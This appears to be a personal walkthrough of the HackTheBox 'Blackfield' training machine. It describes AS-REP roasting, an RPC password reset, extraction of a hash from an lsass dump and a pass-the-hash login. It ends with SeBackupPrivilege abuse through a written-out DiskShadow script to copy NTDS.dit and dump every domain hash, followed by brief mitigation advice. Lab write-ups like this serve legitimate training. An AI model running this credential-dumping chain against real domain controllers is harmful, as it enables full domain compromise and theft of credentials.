I know the sky is not the limit because there are footprints on the Moon — and I made some of them! #Buzz Aldrin
Completed at 23 Sep 2020
Background
Blackfield is a Windows machine from HackTheBox, that is focusing on the enumeration technique, for training your ethical hacking skills and penetration testing skills.
After basic enumeration, this Windows server was a Domain Controller (DC) in the blackfield.local domain. After reconnaissance, a set of user's account was publicly available to view. This DC used Kerberos service. With this user list, I got a non-preauth AS_REP response. Finally, I got the access of a user 'support' account.
Using this support account, I reset the password of a user "Audit2020" and got access to this account. This account has the access rights on the ‘forensic’ shared folder and through this shared folder I could download several files, among others lass.dmp. Decode this file, I got the NTLM hash of the user account svc_backup.
This svc_backup account is the service account for system backup that is a member of the Security Group ‘Backup Operators’. This account has rights to back the critical file, NTDS.dit , and also has permission to execute the program DiskShadow.exe.
After retrieved the NTDS file and decoded it, I go the NTLM hash of the administrative account.
130n@calvinlai.com
Enumeration strategies
According to the nmap result, the target machine is a Domain Controller in the backfield.local , this server has the hostname DC01, the interesting ports are tcp/445 for SMB, 88/tcp for Kerberos, and 389/tcp for LDAP.
Check SMB (445)
Check kerberos-sec (88)
Check LDAP (339)
Hacking Process Part 1 – Enumeration
SMB Enumeration
Started with the enumeration of the SMB protocol by checking the default account access, but nothing information returned. After that, using enum4linux gethered the SMB service of target machine and didn't have any usful information.
smbmap -u "guest" -p "" -H 10.10.10.192
enum4linux 10.10.10.192
Two shared folders (forensic, profiles$) are found using the smbclient and a list of user profile folder list is found at the //10.10.10.192/profiles$. It may be useful, let check this user list using
Hacking Process Part 2 – Initial Low Privilege Access
Enumeration through RPC
As the target provides the AD service, let use the folder name to create a user list file and check with GetNPUsers.py program to find out the "real" user account actually present in the Active Directory and try to capture the NTLM hash.
Exported the shares to a file named ‘userlist.txt’, and check of the usernames are existing and if they have Kerberos pre-authentication enabled, using the parament -format john that sent founded captured Ticket-Gain-Tickets to john for cracking.
Finally, the following three accounts existed at the Active Directory and the password of "support was found.
1. audit2020
2. support
3. svc_backup
Password of the user account support@BLACKFIELD.LOCAL was found #00^BlackKnight
Initial access with the account "support"
Login the "blackfield.local/support" account with the password ":#00^BlackKnight". It was confirmed that the user list and user gourp of the AD service. After futher recon, this account cannot access other SMB share folder and no other information can be found under this .
Before swithing to other strategy, if it is a "support" account, can I do some support service, such as create account, reset account password...etc.
Googled an article explains how to change a password via rpcclient. Finally, I was able to change the password of the account audit2020 to ‘abcd@1234’.
Jump to account "audit2020"
This user account can access the share folder "forensic". Jumped to this user "aduit2020", however, no luck to get the user flag. It is not the target user account.
I downloaded all the files at this forensic account and found a interesting file lass.DMP under memory_analysis folder.
memory_analysis\lsass.DMP
There is a program "volatility" under tool folder which can be used for analyzing memory dumps. This lasass.DMP may be the dump result from lsass.exe, which contains the password hash.
Tried read out the lsass.dmp using different method, first I tried with volatility to read out the DMP file, but couldn’t get it to work on my Kali machine. Finally, used the Python version of Mimikatz, pypykatz. Lucky, another user account "svc_backup" was found with a NTLM hash.
Using the Evil-WinRM I can just pass the hash to login
This account "svc_backup" have the user flag at the Desktop folder. Let's go for Privilege Escalation.
Hacking Process Part 3 – Privilege Escalation
The support account has the support fuction, audit account can access the backup file, will this svc_backup account has system backup function?
Starting check who am i and what access rights I have, A quick check on the privileges of this account that this user is member of the group "Backup Operations" and it have two ‘extra’ privileges, i.e. SeBackupPrivilege and SeRestorePrivilege which are able to back-up critical system files on this Domain Controller.
My target is to get the NTDS.dit file by creating a Volume Shadow Copy which the files are being locked. In addition, I need the SYSTEM hive from the registry which is containing the boot key, which is used to decrypt the NTDS.dit.
Googled, diskshadow.exe is the program to useto create Volume Shadow Snapshots (VSS) of disks and expose them as a folder or as a Driveletter.
Get the NTDS.dit
Even the SeBackupPrivilege is enable, but the system security still not allow me to dump the ntds.dit file. First we need to get the permissions in the file NTDS.dit by following the instruction of this https://github.com/giuliano108/SeBackupPrivilege
Once I have the privileges, next steps, execute the program DiskShadow.exe with the scripts (DiskShadow.exe /s ), which is creating a Volume Shadow Copy and expose the VSS with the Driveletter Z:.
Using the Copy-FileSeBackupPrivilege to get the ntds.dit file and the system.bak (the key of this ntds) that get from the registry
With the secretsdump.py to extract the NTDS.dit and read the hashes.
Dumping to the Administrator account
With the administrator's NTML hash using the Evil-WinRM to create a session with the Administrator-account.
Got the root key
Post Exploitation
Recommendation
This Lab is a sample of Kerberoasting attack, how to prevent it....
Mitigating the brute-forcing aspect of the attack, using the offline brute-force attack the hash dump file to get the initial access acount. Choosing a strong complex password for system account.
SMB Sharing, becareful what kinds of information be shared that may be used to exploitation. If I cannot get the potential user account list, the brute-force attack cannot be success.
Think about what your service accounts have access to, special privilege account can be a risk vectors for unauthorized access.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 10:54:48 AM
Password expires Never
Password changeable 2/24/2020 10:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 11:03:50 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
set context persistent nowriters
set metadata c:\temp\example.cab
set verbose on
begin backup
add volume c:\ alias systemvolume
create
expose %systemvolume% z:
end backup
Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/22/2020 3:00:44 PM
-> set context persistent nowriters
-> set metadata c:\temp\example.cab
-> set verbose on
-> begin backup
-> add volume c:\ alias systemvolume
-> create
Alias systemvolume for shadow ID {a402221f-ec65-43af-b956-3e2baa45fa43} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {2520bff5-0a72-46f3-b718-e47519722936} set as environment variable.
Inserted file Manifest.xml into .cab file example.cab
Inserted file Dis5346.tmp into .cab file example.cab
Querying all shadow copies with the shadow copy set ID {2520bff5-0a72-46f3-b718-e47519722936}
* Shadow copy ID = {a402221f-ec65-43af-b956-3e2baa45fa43} %systemvolume%
- Shadow copy set: {2520bff5-0a72-46f3-b718-e47519722936} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{351b4712-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/22/2020 3:00:44 PM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %systemvolume% z:
-> %systemvolume% = {a402221f-ec65-43af-b956-3e2baa45fa43}
The shadow copy was successfully exposed as z:\.
-> end backup
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
*Evil-WinRM* PS C:\Users\Administrator\desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\desktop> systeminfo
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA435
Original Install Date: 2/1/2020, 12:04:40 PM
System Boot Time: 9/23/2020, 3:11:49 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: fr;French (France)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,540 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,387 MB
Virtual Memory: In Use: 1,412 MB
Page File Location(s): C:\pagefile.sys
Domain: BLACKFIELD.local
Logon Server: \\DC01
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB4552924
[02]: KB4494174
[03]: KB4512577
[04]: KB4523204
[05]: KB4537759
[06]: KB4549947
[07]: KB4565349
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.192
[02]: fe80::fc75:4ec7:3972:a98a
[03]: dead:beef::fc75:4ec7:3972:a98a
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
